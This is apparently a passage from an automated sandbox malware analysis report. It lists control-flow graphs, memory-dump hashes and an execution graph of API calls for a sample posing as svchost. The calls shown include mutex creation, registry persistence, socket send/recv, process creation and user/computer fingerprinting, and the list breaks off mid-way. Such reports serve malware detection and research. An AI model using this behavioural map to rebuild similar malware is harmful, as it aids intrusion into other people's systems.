874->878 879 7ff887be079f-7ff887be07bd 875->879 876->866 878->868 879->873 883 7ff887be07c3-7ff887be07d6 879->883 880->863 889 7ff887be0847-7ff887be0856 883->889 890 7ff887be07d8-7ff887be07d9 883->890 885 7ff887be0a36 884->885 886 7ff887be0a7a-7ff887be0ab7 884->886 885->873 894 7ff887be0aec-7ff887be0b04 886->894 895 7ff887be0ab9-7ff887be0ad0 886->895 892 7ff887be0857-7ff887be0859 889->892 890->879 893 7ff887be07db 890->893 892->873 897 7ff887be085a-7ff887be0872 892->897 893->892 898 7ff887be07dd 893->898 899 7ff887be0b41-7ff887be0b77 894->899 895->899 900 7ff887be0ad2-7ff887be0aeb 895->900 915 7ff887be0874-7ff887be0877 897->915 916 7ff887be08e3-7ff887be08f0 897->916 904 7ff887be0824 898->904 905 7ff887be07df-7ff887be07f0 898->905 902 7ff887be0bac-7ff887be0bc4 899->902 903 7ff887be0b79-7ff887be0b90 899->903 900->894 908 7ff887be0c01-7ff887be0c50 903->908 909 7ff887be0b92-7ff887be0bab 903->909 904->873 907 7ff887be082a-7ff887be0845 904->907 905->878 918 7ff887be07f2-7ff887be0808 905->918 907->889 929 7ff887be0cc1-7ff887be0cfe 908->929 930 7ff887be0c52-7ff887be0c84 908->930 909->902 923 7ff887be08f3 915->923 924 7ff887be0879 915->924 916->923 918->873 919 7ff887be080e-7ff887be0821 918->919 919->904 923->873 926 7ff887be08f9-7ff887be090c 923->926 927 7ff887be08c0 924->927 928 7ff887be087b-7ff887be08a2 924->928 940 7ff887be097d-7ff887be0990 926->940 941 7ff887be090e-7ff887be0912 926->941 932 7ff887be08c3-7ff887be08e1 927->932 933 7ff887be08c2 927->933 928->873 938 7ff887be08a8-7ff887be08be 928->938 932->916 933->932 938->873 938->927 945 7ff887be0993 940->945 944 7ff887be0914 941->944 941->945 947 7ff887be0974-7ff887be097b 944->947 945->873 948 7ff887be0999-7ff887be09b5 945->948 947->940 951 7ff887be09b7-7ff887be09cc 948->951 952 7ff887be09d2-7ff887be09e6 948->952 951->952 952->884 953 7ff887be09e8-7ff887be09ed 952->953 953->947 955 7ff887be09ef 953->955 955->885
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1540923470.00007FF887BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_7ff887be0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "9y$A
                                      • API String ID: 0-495449579
                                      • Opcode ID: 39af7a8588d44a3ec77b7eee35337eb98629d7cd595d1c5f015d8707afaf5550
                                      • Instruction ID: 7a009ae22932bdcde1fdc6cc769074c9b48f7afccc252c4af5ea39a3ddd19757
                                      • Opcode Fuzzy Hash: 39af7a8588d44a3ec77b7eee35337eb98629d7cd595d1c5f015d8707afaf5550
                                      • Instruction Fuzzy Hash: DC624D72C4D68A4FE756DB2888556AC7BF1FF65340F2805FEC09DCB292DA246846C781

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2234 7ff887be0e29-7ff887be0e51 2236 7ff887be0e53-7ff887be0ea9 2234->2236 2237 7ff887be0e0e-7ff887be0e15 2234->2237 2240 7ff887be0ebd-7ff887be0ebe 2236->2240 2241 7ff887be0eab-7ff887be0ebb 2236->2241 2239 7ff887be0e1f-7ff887be0e26 2237->2239 2242 7ff887be0ec1-7ff887be0ed8 2240->2242 2241->2242 2246 7ff887be0f0b-7ff887be0f89 2242->2246 2247 7ff887be0eda-7ff887be0edc 2242->2247 2253 7ff887be0fd3-7ff887be0ff5 2246->2253 2254 7ff887be0f8b-7ff887be0fb9 2246->2254 2247->2246 2248 7ff887be0ede-7ff887be0f04 2247->2248 2248->2246 2259 7ff887be0ff9-7ff887be1004 2253->2259 2256 7ff887be1065-7ff887be1075 2254->2256 2257 7ff887be0fbf-7ff887be0fd2 2254->2257 2262 7ff887be1077 2256->2262 2263 7ff887be1078-7ff887be1090 2256->2263 2257->2253 2257->2256 2259->2256 2261 7ff887be1006-7ff887be1033 2259->2261 2261->2259 2270 7ff887be1035 2261->2270 2262->2263 2264 7ff887be10b1-7ff887be10f0 2263->2264 2265 7ff887be1048-7ff887be1064 2263->2265 2272 7ff887be1161-7ff887be1198 2264->2272 2273 7ff887be10f2-7ff887be1124 2264->2273 2270->2264 2274 7ff887be1037-7ff887be1047 2270->2274 2279 7ff887be11cd-7ff887be11d8 2272->2279 2280 7ff887be119a-7ff887be11aa 2272->2280 2274->2265 2290 7ff887be11ec-7ff887be11f4 2279->2290 2291 7ff887be11da-7ff887be11eb 2279->2291 2283 7ff887be11ac-7ff887be11ae 2280->2283 2284 7ff887be121b-7ff887be121f 2280->2284 2287 7ff887be11b0 2283->2287 2288 7ff887be122a 2283->2288 2284->2288 2292 7ff887be11f6-7ff887be11f9 2287->2292 2293 7ff887be11b2-7ff887be11c4 2287->2293 2295 7ff887be122e-7ff887be12b4 2288->2295 2290->2292 2291->2290 2293->2295 2299 7ff887be11c6-7ff887be11cc 2293->2299 2303 7ff887be12b6-7ff887be12d3 2295->2303 2304 7ff887be1318 2295->2304 2299->2279 2309 7ff887be12e7-7ff887be12f1 2303->2309 2310 7ff887be12d5-7ff887be12d8 2303->2310 2304->2304 2305 7ff887be12d9-7ff887be12e4 2304->2305 2305->2309 2310->2305
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1540923470.00007FF887BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_7ff887be0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 6y
                                      • API String ID: 0-1547487790
                                      • Opcode ID: 51f8661a681d6ce07369ef829078adef6e0bdae8e3dc4ac5ce87d58937d5b65b
                                      • Instruction ID: e907c684cc3c17c858ee16f91314960576368d25a62aa28e1012a79a612d5398
                                      • Opcode Fuzzy Hash: 51f8661a681d6ce07369ef829078adef6e0bdae8e3dc4ac5ce87d58937d5b65b
                                      • Instruction Fuzzy Hash: 16F1383294DBC94FE796DB2898556A97BF1FF56340F1901FBC049CB293DA1C984AC382
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1539153244.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_7ff887afa000_svchost.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: a390357d3f0d4f31de3ed661167a8563e9d793f8f75053bf1f9cae73bed41131
                                      • Instruction ID: 6e497c6394ddd2f2b7344a8d3e04786f75645f46c417d11cd311fdbcc422fbd8
                                      • Opcode Fuzzy Hash: a390357d3f0d4f31de3ed661167a8563e9d793f8f75053bf1f9cae73bed41131
                                      • Instruction Fuzzy Hash: 35410232A0C6588FDB18EBACA8566FD7BE0EF55361F04017FD049C3293DB24A846C791
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1539153244.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_7ff887af0000_svchost.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: a0e8a31a94263c8c7bd000870a489bddfd032522104fb8f35b643a27951f4d11
                                      • Instruction ID: 3a013453436b6fcd810a2d8fe85c473e45fb8c4642be5aa018512f080624b68a
                                      • Opcode Fuzzy Hash: a0e8a31a94263c8c7bd000870a489bddfd032522104fb8f35b643a27951f4d11
                                      • Instruction Fuzzy Hash: F631D23190CB4C8FDB18DBA998466FD7BE1EF95721F04426FE089D3242DB74A8068782
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1539153244.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_7ff887afa000_svchost.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 76ea510fbc648d8a920a9783bf356789f3af11be457cb7c633949a2f9dcb527f
                                      • Instruction ID: 880de7d8a15e07b999a9facb3a3ac8c0832c1b3b2fc07b0dbd908c6f5fb04206
                                      • Opcode Fuzzy Hash: 76ea510fbc648d8a920a9783bf356789f3af11be457cb7c633949a2f9dcb527f
                                      • Instruction Fuzzy Hash: 0B31E43090CB5C8FDB18DFA898466F9BBF1EB99321F14426FD049C3252DB606846CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1540923470.00007FF887BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_7ff887be0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 6y
                                      • API String ID: 0-1547487790
                                      • Opcode ID: 428130f0acdab032b200c4f3eda69d7d9a1b76e8c106d428b91448e25d17709d
                                      • Instruction ID: 9ffa517578465f99f38c851e5407e22e6b6e084221878b9bcfcbe30cf0dedb32
                                      • Opcode Fuzzy Hash: 428130f0acdab032b200c4f3eda69d7d9a1b76e8c106d428b91448e25d17709d
                                      • Instruction Fuzzy Hash: 0D21DB66A8D7D60FD30797385C652987FA1AF672A0F5E40FBC488CB2D3D94D8846C352
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1540923470.00007FF887BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_7ff887be0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4dbe95210f5f7abbb2d2b3ee7eafc8252361ee3cc3ec4f7716395f10fc86b0ea
                                      • Instruction ID: 8e53987b4eba675f8f8acbf3cf8232fabe7769c81580ae4b9d6e59bbde4502ae
                                      • Opcode Fuzzy Hash: 4dbe95210f5f7abbb2d2b3ee7eafc8252361ee3cc3ec4f7716395f10fc86b0ea
                                      • Instruction Fuzzy Hash: 94E0E531A046288BDB60DA48CC41BD9B3B1FB84240F0041E5D44DA3241CA306A84CB42

                                      Execution Graph

                                      Execution Coverage:2.7%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:5.8%
                                      Total number of Nodes:1053
                                      Total number of Limit Nodes:46
                                      execution_graph 45885 42d6a2 45886 42d6ad 45885->45886 45888 42d6c1 45886->45888 45889 430ca3 45886->45889 45888->45888 45890 430cb2 45889->45890 45891 430cae 45889->45891 45893 43b6c1 45890->45893 45891->45888 45894 443697 45893->45894 45895 4436a4 45894->45895 45896 4436af 45894->45896 45906 443649 45895->45906 45898 4436b7 45896->45898 45904 4436c0 __Getctype 45896->45904 45913 443c92 20 API calls _free 45898->45913 45900 4436c5 45914 43ad91 20 API calls _free 45900->45914 45901 4436ea RtlReAllocateHeap 45902 4436ac 45901->45902 45901->45904 45902->45891 45904->45900 45904->45901 45915 440480 7 API calls 2 library calls 45904->45915 45907 443687 45906->45907 45911 443657 __Getctype 45906->45911 45917 43ad91 20 API calls _free 45907->45917 45908 443672 RtlAllocateHeap 45910 443685 45908->45910 45908->45911 45910->45902 45911->45907 45911->45908 45916 440480 7 API calls 2 library calls 45911->45916 45913->45902 45914->45902 45915->45904 45916->45911 45917->45910 45918 424a00 45923 424a7d send 45918->45923 45924 41bd72 45925 41bd87 _Yarn ___scrt_get_show_window_mode 45924->45925 45926 41bf8a 45925->45926 45943 430c79 21 API calls new 45925->45943 45930 41bf3e 45926->45930 45938 41b917 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 45926->45938 45929 41bf9b 45929->45930 45939 430c79 21 API calls new 45929->45939 45932 41bf37 ___scrt_get_show_window_mode 45932->45930 45944 430c79 21 API calls new 45932->45944 45934 41bfd4 ___scrt_get_show_window_mode 45934->45930 45940 4312ff 45934->45940 45936 41bf64 ___scrt_get_show_window_mode 45936->45930 45945 430c79 21 API calls new 45936->45945 45938->45929 45939->45934 45946 43121e 45940->45946 45942 431307 45942->45930 45943->45932 45944->45936 45945->45926 45947 431237 45946->45947 45951 43122d 45946->45951 45947->45951 45952 430c79 21 API calls new 45947->45952 45949 431258 45949->45951 45953 4315ec CryptAcquireContextA 45949->45953 45951->45942 45952->45949 45954 43160d CryptGenRandom 45953->45954 45956 431608 45953->45956 45955 431622 CryptReleaseContext 45954->45955 45954->45956 45955->45956 45956->45951 45957 424991 45963 424a66 recv 45957->45963 45964 439be8 45967 439bf4 _swprintf CallCatchBlock 45964->45967 45965 439c02 45980 43ad91 20 API calls _free 45965->45980 45967->45965 45968 439c2c 45967->45968 45975 442d9a EnterCriticalSection 45968->45975 45970 439c37 45976 439cd8 45970->45976 45971 439c07 __cftoe CallCatchBlock 45975->45970 45978 439ce6 45976->45978 45977 439c42 45981 439c5f LeaveCriticalSection std::_Lockit::~_Lockit 45977->45981 45978->45977 45982 446c9b 36 API calls 2 library calls 45978->45982 45980->45971 45981->45971 45982->45978 45983 40163e 45984 401646 45983->45984 45986 401649 45983->45986 45985 401688 45991 43229f 45985->45991 45986->45985 45988 401676 45986->45988 45990 43229f new 22 API calls 45988->45990 45989 40167c 45990->45989 45994 4322a4 45991->45994 45993 4322d0 45993->45989 45994->45993 45998 439adb 45994->45998 46005 440480 7 API calls 2 library calls 45994->46005 46006 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45994->46006 46007 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45994->46007 46003 443649 __Getctype 45998->46003 45999 443687 46009 43ad91 20 API calls _free 45999->46009 46000 443672 RtlAllocateHeap 46002 443685 46000->46002 46000->46003 46002->45994 46003->45999 46003->46000 46008 440480 7 API calls 2 library calls 46003->46008 46005->45994 46008->46003 46009->46002 46010 43263c 46011 432648 CallCatchBlock 46010->46011 46037 43234b 46011->46037 46013 43264f 46015 432678 46013->46015 46307 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 46013->46307 46019 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46015->46019 46308 441763 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46015->46308 46017 432691 46020 432697 CallCatchBlock 46017->46020 46309 441707 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46017->46309 46026 432717 46019->46026 46310 4408e7 35 API calls 6 library calls 46019->46310 46048 4328c9 46026->46048 46038 432354 46037->46038 46315 4329da IsProcessorFeaturePresent 46038->46315 46040 432360 46316 436cd1 10 API calls 4 library calls 46040->46316 46042 432365 46047 432369 46042->46047 46317 4415bf 46042->46317 46045 432380 46045->46013 46047->46013 46376 434c30 46048->46376 46051 43271d 46052 4416b4 46051->46052 46378 44c239 46052->46378 46054 4416bd 46055 432726 46054->46055 46382 443d25 35 API calls 46054->46382 46057 40d3f0 46055->46057 46384 41a8da LoadLibraryA GetProcAddress 46057->46384 46059 40d40c 46391 40dd83 46059->46391 46061 40d415 46406 4020d6 46061->46406 46064 4020d6 28 API calls 46065 40d433 46064->46065 46412 419d87 46065->46412 46069 40d445 46438 401e6d 46069->46438 46071 40d44e 46072 40d461 46071->46072 46073 40d4b8 46071->46073 46693 40e609 116 API calls 46072->46693 46444 401e45 46073->46444 46076 40d4c6 46080 401e45 22 API calls 46076->46080 46077 40d473 46078 401e45 22 API calls 46077->46078 46079 40d47f 46078->46079 46694 40f98d 36 API calls __EH_prolog 46079->46694 46081 40d4e5 46080->46081 46449 4052fe 46081->46449 46084 40d4f4 46454 408209 46084->46454 46085 40d491 46695 40e5ba 77 API calls 46085->46695 46089 40d49a 46696 40dd70 70 API calls 46089->46696 46098 401fb8 11 API calls 46099 40d520 46098->46099 46100 401e45 22 API calls 46099->46100 46101 40d529 46100->46101 46471 401fa0 46101->46471 46103 40d534 46104 401e45 22 API calls 46103->46104 46105 40d54f 46104->46105 46106 401e45 22 API calls 46105->46106 46107 40d569 46106->46107 46108 40d5cf 46107->46108 46697 40822a 46107->46697 46109 401e45 22 API calls 46108->46109 46115 40d5dc 46109->46115 46111 40d594 46112 401fc2 28 API calls 46111->46112 46113 40d5a0 46112->46113 46116 401fb8 11 API calls 46113->46116 46114 40d650 46120 40d660 CreateMutexA GetLastError 46114->46120 46115->46114 46118 401e45 22 API calls 46115->46118 46117 40d5a9 46116->46117 46702 411f34 RegOpenKeyExA 46117->46702 46119 40d5f5 46118->46119 46125 40d5fc OpenMutexA 46119->46125 46121 40d991 46120->46121 46122 40d67f GetModuleFileNameW 46120->46122 46123 401fb8 11 API calls 46121->46123 46475 4192ae 46122->46475 46150 40d99a ___scrt_get_show_window_mode 46123->46150 46129 40d622 46125->46129 46130 40d60f WaitForSingleObject CloseHandle 46125->46130 46133 411f34 3 API calls 46129->46133 46130->46129 46131 40d6a0 46134 40d6f5 46131->46134 46135 401e45 22 API calls 46131->46135 46132 40dd0f 46775 41239a 30 API calls 46132->46775 46141 40d63b 46133->46141 46137 401e45 22 API calls 46134->46137 46145 40d6bf 46135->46145 46139 40d720 46137->46139 46138 40dd22 46776 410eda 65 API calls ___scrt_get_show_window_mode 46138->46776 46142 40d731 46139->46142 46143 40d72c 46139->46143 46141->46114 46705 41239a 30 API calls 46141->46705 46147 401e45 22 API calls 46142->46147 46709 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 46143->46709 46145->46134 46151 40d6f7 46145->46151 46155 40d6db 46145->46155 46157 40d73a 46147->46157 46148 402073 28 API calls 46149 40dd3a 46148->46149 46602 4052dd 46149->46602 46771 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46150->46771 46707 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 46151->46707 46154 40dd4a 46156 402073 28 API calls 46154->46156 46155->46134 46706 4067a0 36 API calls ___scrt_get_show_window_mode 46155->46706 46160 40dd59 46156->46160 46164 401e45 22 API calls 46157->46164 46163 4194da 79 API calls 46160->46163 46161 40d70d 46161->46134 46165 40d712 46161->46165 46162 40d9ec 46166 401e45 22 API calls 46162->46166 46167 40dd5e 46163->46167 46168 40d755 46164->46168 46708 4066a6 58 API calls 46165->46708 46170 40da10 46166->46170 46171 401fb8 11 API calls 46167->46171 46174 401e45 22 API calls 46168->46174 46502 402073 46170->46502 46172 40dd6a 46171->46172 46604 413980 46172->46604 46177 40d76f 46174->46177 46176 40dd6f 46179 401e45 22 API calls 46177->46179 46178 40da22 46508 41215f RegCreateKeyA 46178->46508 46180 40d789 46179->46180 46184 401e45 22 API calls 46180->46184 46183 401e45 22 API calls 46185 40da44 46183->46185 46189 40d7a3 46184->46189 46514 439867 46185->46514 46188 40d810 46188->46150 46192 40d828 46188->46192 46229 40d8a7 ___scrt_get_show_window_mode 46188->46229 46189->46188 46191 401e45 22 API calls 46189->46191 46190 40da61 46772 41aa4f 81 API calls ___scrt_get_show_window_mode 46190->46772 46201 40d7b8 _wcslen 46191->46201 46194 401e45 22 API calls 46192->46194 46193 40da7e 46196 402073 28 API calls 46193->46196 46197 40d831 46194->46197 46199 40da8d 46196->46199 46203 401e45 22 API calls 46197->46203 46198 40da70 CreateThread 46198->46193 47290 41b212 10 API calls 46198->47290 46200 402073 28 API calls 46199->46200 46202 40da9c 46200->46202 46201->46188 46205 401e45 22 API calls 46201->46205 46518 4194da 46202->46518 46206 40d843 46203->46206 46209 40d7d3 46205->46209 46211 401e45 22 API calls 46206->46211 46208 401e45 22 API calls 46210 40daad 46208->46210 46212 401e45 22 API calls 46209->46212 46214 401e45 22 API calls 46210->46214 46213 40d855 46211->46213 46215 40d7e8 46212->46215 46217 401e45 22 API calls 46213->46217 46216 40dabf 46214->46216 46710 40c5ed 46215->46710 46220 401e45 22 API calls 46216->46220 46218 40d87e 46217->46218 46224 401e45 22 API calls 46218->46224 46222 40dad5 46220->46222 46228 401e45 22 API calls 46222->46228 46223 401ef3 28 API calls 46225 40d807 46223->46225 46226 40d88f 46224->46226 46227 401ee9 11 API calls 46225->46227 46768 40b871 46 API calls _wcslen 46226->46768 46227->46188 46230 40daf5 46228->46230 46492 412338 46229->46492 46235 439867 _strftime 39 API calls 46230->46235 46233 40d942 ctype 46238 401e45 22 API calls 46233->46238 46234 40d89f 46234->46229 46236 40db02 46235->46236 46237 401e45 22 API calls 46236->46237 46239 40db0d 46237->46239 46240 40d959 46238->46240 46241 401e45 22 API calls 46239->46241 46240->46162 46242 40d96d 46240->46242 46243 40db1e 46241->46243 46244 401e45 22 API calls 46242->46244 46542 408f1f 46243->46542 46245 40d976 46244->46245 46769 419bca 28 API calls 46245->46769 46248 40d982 46770 40de34 88 API calls 46248->46770 46251 401e45 22 API calls 46253 40db3c 46251->46253 46252 40d987 46252->46121 46252->46162 46254 40db83 46253->46254 46255 40db4a 46253->46255 46257 401e45 22 API calls 46254->46257 46256 43229f new 22 API calls 46255->46256 46258 40db53 46256->46258 46259 40db91 46257->46259 46260 401e45 22 API calls 46258->46260 46262 40dbd9 46259->46262 46263 40db9c 46259->46263 46261 40db65 46260->46261 46265 40db6c CreateThread 46261->46265 46264 401e45 22 API calls 46262->46264 46266 43229f new 22 API calls 46263->46266 46267 40dbe2 46264->46267 46265->46254 47291 417f6a 101 API calls 2 library calls 46265->47291 46268 40dba5 46266->46268 46271 40dc4c 46267->46271 46272 40dbed 46267->46272 46269 401e45 22 API calls 46268->46269 46270 40dbb6 46269->46270 46273 40dbbd CreateThread 46270->46273 46274 401e45 22 API calls 46271->46274 46275 401e45 22 API calls 46272->46275 46273->46262 47289 417f6a 101 API calls 2 library calls 46273->47289 46276 40dc55 46274->46276 46277 40dbfc 46275->46277 46278 40dc60 46276->46278 46279 40dc99 46276->46279 46280 401e45 22 API calls 46277->46280 46282 401e45 22 API calls 46278->46282 46579 4195f8 GetComputerNameExW GetUserNameW 46279->46579 46283 40dc11 46280->46283 46285 40dc69 46282->46285 46773 40c5a1 31 API calls 46283->46773 46289 401e45 22 API calls 46285->46289 46292 40dc7e 46289->46292 46290 40dc24 46293 401ef3 28 API calls 46290->46293 46303 439867 _strftime 39 API calls 46292->46303 46295 40dc30 46293->46295 46300 401ee9 11 API calls 46295->46300 46296 40dcc1 SetProcessDEPPolicy 46297 40dcc4 CreateThread 46296->46297 46298 40dce5 46297->46298 46299 40dcd9 CreateThread 46297->46299 47261 40e18d 46297->47261 46301 40dcfa 46298->46301 46302 40dcee CreateThread 46298->46302 46299->46298 47292 410b5c 137 API calls 46299->47292 46304 40dc39 CreateThread 46300->46304 46301->46148 46301->46172 46302->46301 47293 411140 38 API calls ___scrt_get_show_window_mode 46302->47293 46305 40dc8b 46303->46305 46304->46271 47288 401bc9 49 API calls _strftime 46304->47288 46774 40b0a3 7 API calls 46305->46774 46307->46013 46308->46017 46309->46019 46310->46026 46315->46040 46316->46042 46321 44cd48 46317->46321 46320 436cfa 8 API calls 3 library calls 46320->46047 46322 44cd65 46321->46322 46325 44cd61 46321->46325 46322->46325 46327 4475a6 46322->46327 46324 432372 46324->46045 46324->46320 46339 432d4b 5 API calls ___raise_securityfailure 46325->46339 46328 4475b2 CallCatchBlock 46327->46328 46340 442d9a EnterCriticalSection 46328->46340 46330 4475b9 46341 44d363 46330->46341 46332 4475c8 46338 4475d7 46332->46338 46352 44743a 23 API calls 46332->46352 46335 4475d2 46353 4474f0 GetStdHandle GetFileType 46335->46353 46336 4475e8 CallCatchBlock 46336->46322 46354 4475f3 LeaveCriticalSection std::_Lockit::~_Lockit 46338->46354 46339->46324 46340->46330 46342 44d36f CallCatchBlock 46341->46342 46343 44d393 46342->46343 46344 44d37c 46342->46344 46355 442d9a EnterCriticalSection 46343->46355 46363 43ad91 20 API calls _free 46344->46363 46347 44d3cb 46364 44d3f2 LeaveCriticalSection std::_Lockit::~_Lockit 46347->46364 46348 44d381 __cftoe CallCatchBlock 46348->46332 46349 44d39f 46349->46347 46356 44d2b4 46349->46356 46352->46335 46353->46338 46354->46336 46355->46349 46365 443005 46356->46365 46358 44d2d3 46373 443c92 20 API calls _free 46358->46373 46359 44d2c6 46359->46358 46372 445fb3 11 API calls 2 library calls 46359->46372 46362 44d325 46362->46349 46363->46348 46364->46348 46370 443012 __Getctype 46365->46370 46366 443052 46375 43ad91 20 API calls _free 46366->46375 46367 44303d RtlAllocateHeap 46368 443050 46367->46368 46367->46370 46368->46359 46370->46366 46370->46367 46374 440480 7 API calls 2 library calls 46370->46374 46372->46359 46373->46362 46374->46370 46375->46368 46377 4328dc GetStartupInfoW 46376->46377 46377->46051 46379 44c24b 46378->46379 46380 44c242 46378->46380 46379->46054 46383 44c138 48 API calls 4 library calls 46380->46383 46382->46054 46383->46379 46385 41a919 LoadLibraryA GetProcAddress 46384->46385 46386 41a909 GetModuleHandleA GetProcAddress 46384->46386 46387 41a947 GetModuleHandleA GetProcAddress 46385->46387 46388 41a937 GetModuleHandleA GetProcAddress 46385->46388 46386->46385 46389 41a973 24 API calls 46387->46389 46390 41a95f GetModuleHandleA GetProcAddress 46387->46390 46388->46387 46389->46059 46390->46389 46777 419493 FindResourceA 46391->46777 46394 439adb new 21 API calls 46395 40ddad _Yarn 46394->46395 46780 402097 46395->46780 46398 401fc2 28 API calls 46399 40ddd3 46398->46399 46400 401fb8 11 API calls 46399->46400 46401 40dddc 46400->46401 46402 439adb new 21 API calls 46401->46402 46403 40dded _Yarn 46402->46403 46786 4062ee 46403->46786 46405 40de20 46405->46061 46407 4020ec 46406->46407 46408 4023ae 11 API calls 46407->46408 46409 402106 46408->46409 46410 402549 28 API calls 46409->46410 46411 402114 46410->46411 46411->46064 46821 4020bf 46412->46821 46414 419d9a 46417 419e0c 46414->46417 46426 401fc2 28 API calls 46414->46426 46429 401fb8 11 API calls 46414->46429 46433 419e0a 46414->46433 46825 404182 28 API calls 46414->46825 46826 41ab9a 46414->46826 46415 401fb8 11 API calls 46416 419e3c 46415->46416 46418 401fb8 11 API calls 46416->46418 46837 404182 28 API calls 46417->46837 46419 419e44 46418->46419 46422 401fb8 11 API calls 46419->46422 46424 40d43c 46422->46424 46423 419e18 46425 401fc2 28 API calls 46423->46425 46434 40e563 46424->46434 46427 419e21 46425->46427 46426->46414 46428 401fb8 11 API calls 46427->46428 46430 419e29 46428->46430 46429->46414 46431 41ab9a 28 API calls 46430->46431 46431->46433 46433->46415 46435 40e56f 46434->46435 46437 40e576 46434->46437 46863 402143 11 API calls 46435->46863 46437->46069 46439 402143 46438->46439 46443 40217f 46439->46443 46864 402710 11 API calls 46439->46864 46441 402164 46865 4026f2 11 API calls std::_Deallocate 46441->46865 46443->46071 46445 401e4d 46444->46445 46446 401e55 46445->46446 46866 402138 22 API calls 46445->46866 46446->46076 46450 4020bf 11 API calls 46449->46450 46451 40530a 46450->46451 46867 403280 46451->46867 46453 405326 46453->46084 46872 4051cf 46454->46872 46456 408217 46876 402035 46456->46876 46459 401fc2 46460 401fd1 46459->46460 46467 402019 46459->46467 46461 4023ae 11 API calls 46460->46461 46462 401fda 46461->46462 46463 40201c 46462->46463 46464 401ff5 46462->46464 46465 40265a 11 API calls 46463->46465 46910 403078 28 API calls 46464->46910 46465->46467 46468 401fb8 46467->46468 46469 4023ae 11 API calls 46468->46469 46470 401fc1 46469->46470 46470->46098 46472 401fb2 46471->46472 46473 401fa9 46471->46473 46472->46103 46911 4025c0 28 API calls 46473->46911 46912 419f23 46475->46912 46480 401fc2 28 API calls 46481 4192ea 46480->46481 46482 401fb8 11 API calls 46481->46482 46483 4192f2 46482->46483 46484 411f91 31 API calls 46483->46484 46486 419348 46483->46486 46485 41931b 46484->46485 46487 419326 StrToIntA 46485->46487 46486->46131 46488 41933d 46487->46488 46489 419334 46487->46489 46491 401fb8 11 API calls 46488->46491 46920 41accf 22 API calls 46489->46920 46491->46486 46493 412356 46492->46493 46494 4062ee 28 API calls 46493->46494 46495 41236b 46494->46495 46496 4020d6 28 API calls 46495->46496 46497 41237b 46496->46497 46498 41215f 14 API calls 46497->46498 46499 412385 46498->46499 46500 401fb8 11 API calls 46499->46500 46501 412392 46500->46501 46501->46233 46503 40207b 46502->46503 46504 4023ae 11 API calls 46503->46504 46505 402086 46504->46505 46921 4024cd 46505->46921 46509 4121af 46508->46509 46511 412178 46508->46511 46510 401fb8 11 API calls 46509->46510 46512 40da38 46510->46512 46513 41218a RegSetValueExA RegCloseKey 46511->46513 46512->46183 46513->46509 46515 439880 _strftime 46514->46515 46925 438bbe 46515->46925 46517 40da51 46517->46190 46517->46193 46519 4194f0 GetLocalTime 46518->46519 46520 41958b 46518->46520 46521 4052fe 28 API calls 46519->46521 46522 401fb8 11 API calls 46520->46522 46523 419532 46521->46523 46524 419593 46522->46524 46525 408209 28 API calls 46523->46525 46526 401fb8 11 API calls 46524->46526 46527 41953e 46525->46527 46528 40daa1 46526->46528 46953 402ef0 46527->46953 46528->46208 46531 408209 28 API calls 46532 419556 46531->46532 46958 41928b 76 API calls 46532->46958 46534 419564 46535 401fb8 11 API calls 46534->46535 46536 419570 46535->46536 46537 401fb8 11 API calls 46536->46537 46538 419579 46537->46538 46539 401fb8 11 API calls 46538->46539 46540 419582 46539->46540 46541 401fb8 11 API calls 46540->46541 46541->46520 46962 401f66 46542->46962 46544 408f36 _wcslen 46545 408f60 46544->46545 46546 